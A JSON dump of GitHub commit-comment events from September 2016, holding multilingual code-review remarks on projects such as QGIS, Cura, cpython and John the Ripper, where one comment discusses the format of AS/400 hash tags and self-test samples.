{"id":"4517410699","type":"CommitCommentEvent","actor":{"login":"DomceyKoo"},"repo":{"name":"IvorHu/RealStuff"},"payload":{"comment":{"id":18901505,"position":null,"line":null,"path":null,"commit_id":"d601faa4f31ff978a984203dc028457829280132","created_at":"2016-09-05T15:17:19Z","updated_at":"2016-09-05T15:17:19Z","body":"静待9.6来临，test fix。谢谢 Ivor 的神速fixing bug啦~~"}},"created_at":"2016-09-05T15:17:19Z"}
{"id":"4517413062","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":18901511,"position":104,"line":127,"path":"Mopy/bash/game/fallout4/constants.py","commit_id":"63e43096b032765deb15f5520710c80159f0e140","created_at":"2016-09-05T15:17:54Z","updated_at":"2016-09-05T15:17:54Z","body":"No we need someone to code the parser for those files - if you know of any updates on file format reverse engineering post them to #296.\r\n\r\nYou think we should leave those around if existing ?\r\n\r\nCould you please reply to me on https://github.com/Sharlikran/wrye-bash/issues/20"}},"created_at":"2016-09-05T15:17:54Z"}
{"id":"4517414338","type":"CommitCommentEvent","actor":{"login":"sKawashima"},"repo":{"name":"YngLab/Msite"},"payload":{"comment":{"id":18901518,"position":23,"line":23,"path":"index.html","commit_id":"9b19ac674626d5af630e92ab24653f8b7045483c","created_at":"2016-09-05T15:18:14Z","updated_at":"2016-09-05T15:18:14Z","body":"h系タグは使わないほうが良いとまでは言わないが、h2以降のほうが良いかな？（検索関係の都合）"}},"created_at":"2016-09-05T15:18:14Z"}
{"id":"4517417462","type":"CommitCommentEvent","actor":{"login":"jef-n"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18901529,"position":4,"line":250,"path":"src/app/qgsoptions.cpp","commit_id":"aa256b8c33343e834aae0755950ab891007b483c","created_at":"2016-09-05T15:19:00Z","updated_at":"2016-09-05T15:19:00Z","body":"This mimics Qt's default user-agent."}},"created_at":"2016-09-05T15:19:00Z"}
{"id":"4517417496","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18901530,"position":null,"line":null,"path":null,"commit_id":"0ee3ae136d58abc240457dbb75b0aa6d1065c95b","created_at":"2016-09-05T15:19:01Z","updated_at":"2016-09-05T15:19:01Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read](http://github.com/weidai11/cryptopp/issues/252)."}},"created_at":"2016-09-05T15:19:01Z"}
{"id":"4517417903","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18901532,"position":34,"line":108,"path":"cura/PlatformPhysics.py","commit_id":"4817dbe62ffef1b4ee9cc3e950e63be04e27be94","created_at":"2016-09-05T15:19:08Z","updated_at":"2016-09-05T15:19:08Z","body":"This actually checks `_max_overlap_checks + 1` times.\r\nAlso, what's wrong with a while loop and a break?"}},"created_at":"2016-09-05T15:19:08Z"}
{"id":"4517418886","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18901533,"position":8,"line":8,"path":"ALGORYTHMS/task2/randoms_list.h","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-05T15:19:18Z","updated_at":"2016-09-05T15:19:18Z","body":"А в чём проявится преимущество класса над свободной функцией?"}},"created_at":"2016-09-05T15:19:18Z"}
{"id":"4517421798","type":"CommitCommentEvent","actor":{"login":"sKawashima"},"repo":{"name":"YngLab/Msite"},"payload":{"comment":{"id":18901542,"position":26,"line":26,"path":"index.html","commit_id":"9b19ac674626d5af630e92ab24653f8b7045483c","created_at":"2016-09-05T15:20:01Z","updated_at":"2016-09-05T15:20:01Z","body":"ここで改行するなら27行目はインデントが一つ多くあるべき。或いは、改行しなくて良い。"}},"created_at":"2016-09-05T15:20:01Z"}
{"id":"4517424060","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901547,"position":null,"line":null,"path":null,"commit_id":"180f3e3e6dc3300fb249e73cb0346c751c23153b","created_at":"2016-09-05T15:20:34Z","updated_at":"2016-09-05T15:20:34Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#VNgAwfCJTg-3hIX62QRZmA"}},"created_at":"2016-09-05T15:20:34Z"}
{"id":"4517424136","type":"CommitCommentEvent","actor":{"login":"sKawashima"},"repo":{"name":"YngLab/Msite"},"payload":{"comment":{"id":18901548,"position":27,"line":27,"path":"index.html","commit_id":"9b19ac674626d5af630e92ab24653f8b7045483c","created_at":"2016-09-05T15:20:35Z","updated_at":"2016-09-05T15:20:35Z","body":"width、heightはスタイル指定。コーディング規約より、これらはcssに奇術すべき。"}},"created_at":"2016-09-05T15:20:35Z"}
{"id":"4517425046","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18901552,"position":44,"line":44,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-05T15:20:49Z","updated_at":"2016-09-05T15:20:49Z","body":"Сама функция, которая решает задачу, должна быть законченной. И без багов."}},"created_at":"2016-09-05T15:20:49Z"}
{"id":"4517425069","type":"CommitCommentEvent","actor":{"login":"moylop260"},"repo":{"name":"Vauxoo/addons-vauxoo"},"payload":{"comment":{"id":18901553,"position":null,"line":null,"path":null,"commit_id":"a101d885aced0c8f75c9316e3f5bc9955b43ffc3","created_at":"2016-09-05T15:20:49Z","updated_at":"2016-09-05T15:20:49Z","body":"Así como cuando te equivocas de botón en vez de usar `merge and squash` desde github y usas solo `merge` 😢 "}},"created_at":"2016-09-05T15:20:49Z"}
{"id":"4517427606","type":"CommitCommentEvent","actor":{"login":"sKawashima"},"repo":{"name":"YngLab/Msite"},"payload":{"comment":{"id":18901560,"position":35,"line":35,"path":"index.html","commit_id":"9b19ac674626d5af630e92ab24653f8b7045483c","created_at":"2016-09-05T15:21:26Z","updated_at":"2016-09-05T15:21:26Z","body":"サーバーなくてもjsでなんとかなる…けど、同然サーバーを使うphpで書くと思われる"}},"created_at":"2016-09-05T15:21:26Z"}
{"id":"4517428423","type":"CommitCommentEvent","actor":{"login":"systemed"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18901564,"position":4,"line":250,"path":"src/app/qgsoptions.cpp","commit_id":"aa256b8c33343e834aae0755950ab891007b483c","created_at":"2016-09-05T15:21:37Z","updated_at":"2016-09-05T15:21:37Z","body":"That doesn't mean it's right."}},"created_at":"2016-09-05T15:21:37Z"}
{"id":"4517430688","type":"CommitCommentEvent","actor":{"login":"lionng429"},"repo":{"name":"lionng429/react-file-uploader"},"payload":{"comment":{"id":18901568,"position":98,"line":71,"path":"src/UploadHandler.js","commit_id":"1dc67af3c15c6109122f05f0dbc8e205dbcb1fd8","created_at":"2016-09-05T15:22:09Z","updated_at":"2016-09-05T15:22:09Z","body":"seems that the error message is about \"key\" props?"}},"created_at":"2016-09-05T15:22:09Z"}
{"id":"4517433077","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901574,"position":null,"line":null,"path":null,"commit_id":"3026f7ccb2b51f8a9b2c5e7ae2428a1a145110fc","created_at":"2016-09-05T15:22:45Z","updated_at":"2016-09-05T15:22:45Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#M1J2gOLBRkGY370KEQ3SPQ"}},"created_at":"2016-09-05T15:22:45Z"}
{"id":"4517435641","type":"CommitCommentEvent","actor":{"login":"sKawashima"},"repo":{"name":"YngLab/Msite"},"payload":{"comment":{"id":18901581,"position":74,"line":74,"path":"index.html","commit_id":"9b19ac674626d5af630e92ab24653f8b7045483c","created_at":"2016-09-05T15:23:21Z","updated_at":"2016-09-05T15:23:21Z","body":"無しではないが、文字組みの見栄えが悪ければcssで書くべき。\r\nその際はboaderのleftとrightにそれぞれ1px solid位を指定すればいい。"}},"created_at":"2016-09-05T15:23:21Z"}
{"id":"4517438276","type":"CommitCommentEvent","actor":{"login":"Sanne"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":18901594,"position":25,"line":25,"path":"posts/Guillaume/2016-09-05-hibernate-validator-530-cr1-out.adoc","commit_id":"ccd0d33f61919d603ddbb46813eb139df1f0c96e","created_at":"2016-09-05T15:23:59Z","updated_at":"2016-09-05T15:23:59Z","body":"Just omit it?\r\n\"We provide an alternative [...]\""}},"created_at":"2016-09-05T15:23:59Z"}
{"id":"4517438619","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901595,"position":null,"line":null,"path":null,"commit_id":"7966917efd91706ec4aaa6cfda3fff1e387183de","created_at":"2016-09-05T15:24:06Z","updated_at":"2016-09-05T15:24:06Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#OEtI86YbTiO2kLHvHCOFIg"}},"created_at":"2016-09-05T15:24:06Z"}
{"id":"4517442579","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18901604,"position":76,"line":76,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-05T15:25:03Z","updated_at":"2016-09-05T15:25:03Z","body":"Да, с рекурсией (а пуще с функциональным программированием) можно многие вещи выразить лаконичнее.\r\nНо, к сожалению, это часто не оптимально, а мы как раз заинтересованы в оптимальности.\r\n\r\nА обработку маленьких данных и разовые задачи вполне разумно делать именно такими простыми в использовании и красивыми, но не оптимальными инструментами."}},"created_at":"2016-09-05T15:25:03Z"}
{"id":"4517442847","type":"CommitCommentEvent","actor":{"login":"zhangyangyu"},"repo":{"name":"tiran/cpython"},"payload":{"comment":{"id":18901605,"position":46,"line":1372,"path":"Doc/library/ssl.rst","commit_id":"75990d0e0e3f8439f3936797c0aacb1df3c0c74c","created_at":"2016-09-05T15:25:08Z","updated_at":"2016-09-05T15:25:08Z","body":"Missing a period at the end."}},"created_at":"2016-09-05T15:25:08Z"}
{"id":"4517443814","type":"CommitCommentEvent","actor":{"login":"sKawashima"},"repo":{"name":"YngLab/Msite"},"payload":{"comment":{"id":18901607,"position":null,"line":null,"path":null,"commit_id":"9b19ac674626d5af630e92ab24653f8b7045483c","created_at":"2016-09-05T15:25:20Z","updated_at":"2016-09-05T15:25:20Z","body":"ほとんどすべての要素をpで囲ってるけど、一部div（ブロック要素）のが良いかも。\r\n「ブロック要素」と「インライン要素」についてググってくれれば。"}},"created_at":"2016-09-05T15:25:20Z"}
{"id":"4517445075","type":"CommitCommentEvent","actor":{"login":"Lagerhjelm"},"repo":{"name":"Lagerhjelm/hello-world"},"payload":{"comment":{"id":18901608,"position":5,"line":5,"path":"README.md","commit_id":"7ebab1e1057a967675ac8c9f466105cafe22907a","created_at":"2016-09-05T15:25:38Z","updated_at":"2016-09-05T15:25:38Z","body":"First commit ever!"}},"created_at":"2016-09-05T15:25:38Z"}
{"id":"4517445269","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18901609,"position":null,"line":null,"path":null,"commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-05T15:25:40Z","updated_at":"2016-09-05T15:25:40Z","body":"I think we should drop the final `*` from the `\"$as400des$*\"` format tag.\r\n\r\nAnd the `*` separator between user name and hash is most likely due to `$` being a valid character in as400 name, see https://github.com/magnumripper/JohnTheRipper/pull/2257#issuecomment-244595208 (BTW: May be it is a good idea to document that knowledge about AS/400 user names in the source code.)\r\n```\r\n$as400des$*JJJJJJJJ*8B5F0B1D0826D927\"\r\n```\r\n\r\n\r\n\r\nThe AS/400 SSHA1 format hash looks like this:\r\n```\r\n$as400ssha1$CED8050C275A5005D101051FF5BCCADF693E8AB7$BART\r\n```\r\nconverted to\r\n```\r\n$dynamic_1590$4C106E52CA196986E1C52C7FCD02AF046B76C73C$HEX$0052004F00420020002000200020002000200020\r\n```\r\nfor dynamic_1590.\r\n\r\nSo, if we would change the sequence of user id and hash, the AS/400 DES format hash could look like:\r\n```\r\n$as400des$8B5F0B1D0826D927$JJJJJJJJ\"\r\n``` \r\n\r\nThat way, it would look more similar to the AS/400 SSHA1 format, and there wouldn't be any need for special handling of user names with '$' character. Instead, a check of maximum user name length might be needed, and (optionally), a check for invalid characters in the user name.\r\n"}},"created_at":"2016-09-05T15:25:40Z"}
{"id":"4517446015","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901612,"position":null,"line":null,"path":null,"commit_id":"15f990d514b4ca41bd0267a8da6d28fca00cf563","created_at":"2016-09-05T15:25:52Z","updated_at":"2016-09-05T15:25:52Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#D7oodpGUTe-8JFtq8cenIA"}},"created_at":"2016-09-05T15:25:52Z"}
{"id":"4517448708","type":"CommitCommentEvent","actor":{"login":"ingbrzy"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18901615,"position":null,"line":null,"path":null,"commit_id":"ae129d3b55fa569f1dc117b24e468118a5ed4b07","created_at":"2016-09-05T15:26:31Z","updated_at":"2016-09-05T15:26:31Z","body":"sure.. your translation has to be in values-es"}},"created_at":"2016-09-05T15:26:31Z"}
{"id":"4517449031","type":"CommitCommentEvent","actor":{"login":"masterchef8"},"repo":{"name":"neuronalX/DataSurvey"},"payload":{"comment":{"id":18901616,"position":null,"line":null,"path":null,"commit_id":"95e0fc3c465968d5f7b0f0a7a73dc25263a9db11","created_at":"2016-09-05T15:26:36Z","updated_at":"2016-09-05T15:26:36Z","body":"Oops ! i'll do it ASAP !"}},"created_at":"2016-09-05T15:26:36Z"}
{"id":"4517449932","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":18901619,"position":104,"line":127,"path":"Mopy/bash/game/fallout4/constants.py","commit_id":"63e43096b032765deb15f5520710c80159f0e140","created_at":"2016-09-05T15:26:48Z","updated_at":"2016-09-05T15:26:48Z","body":"As far as the strings files go if there is no BA2 support then users will have to extract the strings files in order to eliminate the Wrye error that it can't find them.  Which in that case I wouldn't remove them until BA2 support is added."}},"created_at":"2016-09-05T15:26:48Z"}
{"id":"4517449956","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18901620,"position":98,"line":98,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"8ee8f7f620cec9f4139b8f0a48eb14dc88e377e0","created_at":"2016-09-05T15:26:48Z","updated_at":"2016-09-05T15:26:48Z","body":"Должно быть всегда правильно на корректных входных данных.\r\nА на некорректных хотя бы не должно падать или вести себя непредсказуемо."}},"created_at":"2016-09-05T15:26:48Z"}
{"id":"4517450676","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"jaels/school"},"payload":{"comment":{"id":18901621,"position":null,"line":null,"path":null,"commit_id":"4557737b6860c22e3045e37a412d454015bc9f96","created_at":"2016-09-05T15:26:59Z","updated_at":"2016-09-05T15:26:59Z","body":"LGTM (but it is more fun if you do it as a snippet and put the text in someone else's site)"}},"created_at":"2016-09-05T15:26:59Z"}
{"id":"4517451056","type":"CommitCommentEvent","actor":{"login":"sai-prasanna"},"repo":{"name":"phedlund/SWMessages"},"payload":{"comment":{"id":18901624,"position":null,"line":null,"path":null,"commit_id":"18a7740b0094cef39b22272ba0f84350e02fcc4d","created_at":"2016-09-05T15:27:05Z","updated_at":"2016-09-05T15:27:05Z","body":"Dude if you want Obj C try TSMessages, I cloned it from that "}},"created_at":"2016-09-05T15:27:05Z"}
{"id":"4517453311","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"jaels/school"},"payload":{"comment":{"id":18901628,"position":4,"line":4,"path":"wk2/monday_js/exercise2.js","commit_id":"8be175ae12da7e2da661266d8493e642c2499b19","created_at":"2016-09-05T15:27:39Z","updated_at":"2016-09-05T15:27:39Z","body":"I think we wanted to return the element"}},"created_at":"2016-09-05T15:27:39Z"}
{"id":"4517453804","type":"CommitCommentEvent","actor":{"login":"NycuRO"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18901630,"position":9,"line":15,"path":"src/robske_110/EasyFloatingTextListener.php","commit_id":"8aa3d1ee4c5d2263c4b5015e868e3b6b0d7e8488","created_at":"2016-09-05T15:27:46Z","updated_at":"2016-09-05T15:27:46Z","body":"constructEasyFloatingTextListener*"}},"created_at":"2016-09-05T15:27:46Z"}
{"id":"4517457250","type":"CommitCommentEvent","actor":{"login":"Antamonova"},"repo":{"name":"Antamonova/Homework_1"},"payload":{"comment":{"id":18901634,"position":null,"line":null,"path":null,"commit_id":"d25146d7fc67e7e280418814ae77ef271022790c","created_at":"2016-09-05T15:28:34Z","updated_at":"2016-09-05T15:28:34Z","body":"\r\n\r\n[Почта РФ.txt](https://github.com/Antamonova/Homework_1/files/455301/default.txt)\r\n"}},"created_at":"2016-09-05T15:28:34Z"}
{"id":"4517458835","type":"CommitCommentEvent","actor":{"login":"adjohu"},"repo":{"name":"skidding/react-cosmos"},"payload":{"comment":{"id":18901637,"position":11,"line":13,"path":"packages/react-component-playground/package.json","commit_id":"482ce7ad588152962d398407c3477f6d24a4f080","created_at":"2016-09-05T15:28:56Z","updated_at":"2016-09-05T15:28:56Z","body":"Looks like this line is causing issues when I try to install\r\n\r\n```\r\n npm i --save-dev react-cosmos\r\nnpm ERR! git rev-list -n1 use-react-dom-polyfill: fatal: ambiguous argument 'use-react-dom-polyfill': unknown revision or path not in the working tree.\r\n```"}},"created_at":"2016-09-05T15:28:56Z"}
{"id":"4517459878","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"jaels/school"},"payload":{"comment":{"id":18901639,"position":2,"line":2,"path":"wk2/exercise1.js","commit_id":"972fd7eb29331b499389e36950529f7663ed2a6f","created_at":"2016-09-05T15:29:11Z","updated_at":"2016-09-05T15:29:11Z","body":"I think we want to pass `str` rather than `\"h2\"` here"}},"created_at":"2016-09-05T15:29:11Z"}
{"id":"4517462746","type":"CommitCommentEvent","actor":{"login":"dhrubaz"},"repo":{"name":"ResurrectionRemix/Resurrection_packages_apps_Settings"},"payload":{"comment":{"id":18901647,"position":null,"line":null,"path":null,"commit_id":"54343cc5f66461477875616565c170b858acbec0","created_at":"2016-09-05T15:29:54Z","updated_at":"2016-09-05T15:29:54Z","body":"In which version? I'm using 7.5.0"}},"created_at":"2016-09-05T15:29:54Z"}
{"id":"4517463090","type":"CommitCommentEvent","actor":{"login":"bbinet"},"repo":{"name":"mozilla-services/lua_sandbox_extensions"},"payload":{"comment":{"id":18901648,"position":31,"line":60,"path":"lsb/modules/lsb/util.lua","commit_id":"320d2aee5522fd48e45f4a1f6a0caa50eff7b3d7","created_at":"2016-09-05T15:29:59Z","updated_at":"2016-09-05T15:29:59Z","body":"`c.foo` value should be 6, isn't it?"}},"created_at":"2016-09-05T15:29:59Z"}
{"id":"4517463683","type":"CommitCommentEvent","actor":{"login":"msarahan"},"repo":{"name":"conda-forge/libhwloc-feedstock"},"payload":{"comment":{"id":18901649,"position":null,"line":null,"path":null,"commit_id":"f2e6ce14beeebfe3047f68af721c398fb293ed10","created_at":"2016-09-05T15:30:07Z","updated_at":"2016-09-05T15:30:07Z","body":"Sorry, I don't know.  @pelson or perhaps @jakirkham might have an explanation of how this works, and why it is OK for these to be public."}},"created_at":"2016-09-05T15:30:07Z"}
{"id":"4517464932","type":"CommitCommentEvent","actor":{"login":"gsmet"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":18901652,"position":25,"line":25,"path":"posts/Guillaume/2016-09-05-hibernate-validator-530-cr1-out.adoc","commit_id":"ccd0d33f61919d603ddbb46813eb139df1f0c96e","created_at":"2016-09-05T15:30:25Z","updated_at":"2016-09-05T15:30:25Z","body":"Fixed! Thanks for the feedback."}},"created_at":"2016-09-05T15:30:25Z"}
{"id":"4517466569","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18901656,"position":149,"line":149,"path":"src/as400_des_fmt_plug.c","commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-05T15:30:47Z","updated_at":"2016-09-05T15:30:47Z","body":"This format sets FMT_CASE and FMT_8_BIT, but all the self tests just use upper case ASCII passwords.\r\nIf AS/400 DES format really allows lower case passwords and non-ASCII characters, it would be good to have samples generated on a real AS/400 integrated into the self tests.\r\nIf AS/400 doesn't allow lower case or 8bit characters, those flags shouldn't be set."}},"created_at":"2016-09-05T15:30:47Z"}
{"id":"4517467029","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"jaels/school"},"payload":{"comment":{"id":18901657,"position":4,"line":4,"path":"wk2/monday_js/exercise2.js","commit_id":"8be175ae12da7e2da661266d8493e642c2499b19","created_at":"2016-09-05T15:30:54Z","updated_at":"2016-09-05T15:30:54Z","body":"Right, we wanted to return an _array_ of elements"}},"created_at":"2016-09-05T15:30:54Z"}
{"id":"4517467162","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901658,"position":null,"line":null,"path":null,"commit_id":"3ba1a60b9decf15ca126ebe702ea5760dc390d50","created_at":"2016-09-05T15:30:57Z","updated_at":"2016-09-05T15:30:57Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Fa2d8VP8RNi_Rt4xF9T8dA"}},"created_at":"2016-09-05T15:30:57Z"}
{"id":"4517468507","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"fredpinon/Fred"},"payload":{"comment":{"id":18901662,"position":null,"line":null,"path":null,"commit_id":"97b7dcee229c2b3242f77c785d493dd2d46bc12a","created_at":"2016-09-05T15:31:16Z","updated_at":"2016-09-05T15:31:16Z","body":"These two look good to me"}},"created_at":"2016-09-05T15:31:16Z"}
{"id":"4517470476","type":"CommitCommentEvent","actor":{"login":"cbaaa"},"repo":{"name":"cbaaa/minfolio"},"payload":{"comment":{"id":18901667,"position":5,"line":20,"path":"app/admin/controllers/settingsController.js","commit_id":"bc2ed96923a708ef3acbfb8c8bed0fcc6a07fa10","created_at":"2016-09-05T15:31:46Z","updated_at":"2016-09-05T15:31:46Z","body":"?"}},"created_at":"2016-09-05T15:31:46Z"}
{"id":"4517471275","type":"CommitCommentEvent","actor":{"login":"Komzpa"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18901669,"position":4,"line":250,"path":"src/app/qgsoptions.cpp","commit_id":"aa256b8c33343e834aae0755950ab891007b483c","created_at":"2016-09-05T15:31:58Z","updated_at":"2016-09-05T15:31:58Z","body":"@jef-n unfortunately, this renders QGIS/QuickMapServices unusable now - default \"Mozilla/5.0\" is banned, as it is used by too many different applications that don't bother to identify themselves so that osm.org sysadmins can contact them in case of problems."}},"created_at":"2016-09-05T15:31:58Z"}
{"id":"4517473083","type":"CommitCommentEvent","actor":{"login":"Yakan-Kettle"},"repo":{"name":"YngLab/Msite"},"payload":{"comment":{"id":18901673,"position":null,"line":null,"path":null,"commit_id":"9b19ac674626d5af630e92ab24653f8b7045483c","created_at":"2016-09-05T15:32:25Z","updated_at":"2016-09-05T15:32:25Z","body":"ありがたいことでございますなぁ"}},"created_at":"2016-09-05T15:32:25Z"}
{"id":"4517473250","type":"CommitCommentEvent","actor":{"login":"Komzpa"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18901675,"position":4,"line":250,"path":"src/app/qgsoptions.cpp","commit_id":"aa256b8c33343e834aae0755950ab891007b483c","created_at":"2016-09-05T15:32:28Z","updated_at":"2016-09-05T15:32:28Z","body":"related QMS issue: https://github.com/nextgis/quickmapservices/issues/103"}},"created_at":"2016-09-05T15:32:28Z"}
{"id":"4517473769","type":"CommitCommentEvent","actor":{"login":"abitmore"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":18901676,"position":null,"line":null,"path":null,"commit_id":"6500bb65eb6282866f3c6f356cbcbe09fd03c7bf","created_at":"2016-09-05T15:32:35Z","updated_at":"2016-09-05T15:32:35Z","body":"@biophil see https://github.com/steemit/steem/issues/259#issuecomment-243159839"}},"created_at":"2016-09-05T15:32:35Z"}
{"id":"4517476443","type":"CommitCommentEvent","actor":{"login":"krzysztofp"},"repo":{"name":"dimagi/rapidsms"},"payload":{"comment":{"id":18901679,"position":null,"line":null,"path":null,"commit_id":"a9853713aa1d1012738ee5a45e5ddbd72fe9fcf5","created_at":"2016-09-05T15:33:14Z","updated_at":"2016-09-05T15:33:14Z","body":"Is this really a \"unit\" test?"}},"created_at":"2016-09-05T15:33:14Z"}
{"id":"4517476923","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901681,"position":null,"line":null,"path":null,"commit_id":"11e658ac081ec590ea106cda942f670429549b34","created_at":"2016-09-05T15:33:22Z","updated_at":"2016-09-05T15:33:22Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ZKspZdi7RHy-G4SrIrMn-Q"}},"created_at":"2016-09-05T15:33:22Z"}
{"id":"4517479375","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"juliendubrail/julien_spices"},"payload":{"comment":{"id":18901689,"position":3,"line":2,"path":"wk2/d6ex3.js","commit_id":"3d49507fd7444a5ac77705cb9444f2465370b2c3","created_at":"2016-09-05T15:33:55Z","updated_at":"2016-09-05T15:33:55Z","body":"I think we'll have a problem here because text nodes do not have `style` properties. You could use `createElement` instead and append to it a text node"}},"created_at":"2016-09-05T15:33:55Z"}
{"id":"4517481762","type":"CommitCommentEvent","actor":{"login":"aleclarson"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18901693,"position":4,"line":22,"path":"React/Modules/RCTDevMenu.m","commit_id":"dab24b4a6c2b4911c9af72ee88456804f71a2f2d","created_at":"2016-09-05T15:34:29Z","updated_at":"2016-09-05T15:34:29Z","body":"@bestander Do you know which commit fixes this one?"}},"created_at":"2016-09-05T15:34:29Z"}
{"id":"4517481790","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901694,"position":null,"line":null,"path":null,"commit_id":"266f2c4e6846303da5269dbb65dfe8142bea8b0e","created_at":"2016-09-05T15:34:31Z","updated_at":"2016-09-05T15:34:31Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#SdI8eJ3VQf2ppSooM-70Iw"}},"created_at":"2016-09-05T15:34:31Z"}
{"id":"4517482642","type":"CommitCommentEvent","actor":{"login":"shashee1234"},"repo":{"name":"shashee1234/helloworldz"},"payload":{"comment":{"id":18901698,"position":null,"line":null,"path":null,"commit_id":"cfde3579ddc660f8f43749737c33432c0ef718cb","created_at":"2016-09-05T15:34:44Z","updated_at":"2016-09-05T15:34:44Z","body":"kkkkk"}},"created_at":"2016-09-05T15:34:44Z"}
{"id":"4517483017","type":"CommitCommentEvent","actor":{"login":"Volind"},"repo":{"name":"rowen92/cv"},"payload":{"comment":{"id":18901700,"position":95,"line":95,"path":"public/stylesheets/main.css","commit_id":"96de0361e1e52a5ac2c5acbab3f7a5f6fe9f7a30","created_at":"2016-09-05T15:34:50Z","updated_at":"2016-09-05T15:34:50Z","body":"BEM-like selector in rules. But one of BEM concepts is isolating styles! You are using shared styles here. If you change   property here then style of Block will be also changed."}},"created_at":"2016-09-05T15:34:50Z"}
{"id":"4517486033","type":"CommitCommentEvent","actor":{"login":"SohamJ"},"repo":{"name":"TeamOrion/device_qcom_common"},"payload":{"comment":{"id":18901707,"position":null,"line":null,"path":null,"commit_id":"f28fa1f0ecaa41d5bc6b9c19125ad15abf36498c","created_at":"2016-09-05T15:35:33Z","updated_at":"2016-09-05T15:35:33Z","body":"Nothing good comes from committing in a hurry :D "}},"created_at":"2016-09-05T15:35:33Z"}
{"id":"4517486185","type":"CommitCommentEvent","actor":{"login":"getify"},"repo":{"name":"pertrai1/You-Dont-Know-JS"},"payload":{"comment":{"id":18901708,"position":null,"line":null,"path":null,"commit_id":"896f6874984d93710d127ff5369f6689af785e69","created_at":"2016-09-05T15:35:35Z","updated_at":"2016-09-05T15:35:35Z","body":"Thank you! "}},"created_at":"2016-09-05T15:35:35Z"}
{"id":"4517487819","type":"CommitCommentEvent","actor":{"login":"zhangyangyu"},"repo":{"name":"tiran/cpython"},"payload":{"comment":{"id":18901713,"position":113,"line":792,"path":"Lib/ssl.py","commit_id":"75990d0e0e3f8439f3936797c0aacb1df3c0c74c","created_at":"2016-09-05T15:36:01Z","updated_at":"2016-09-05T15:36:01Z","body":"I like this check. In the review of your last patch, I test accessing *session* before connect a get a \"NoneType doesn't have attribute seesion\" error message which is not obvious."}},"created_at":"2016-09-05T15:36:01Z"}
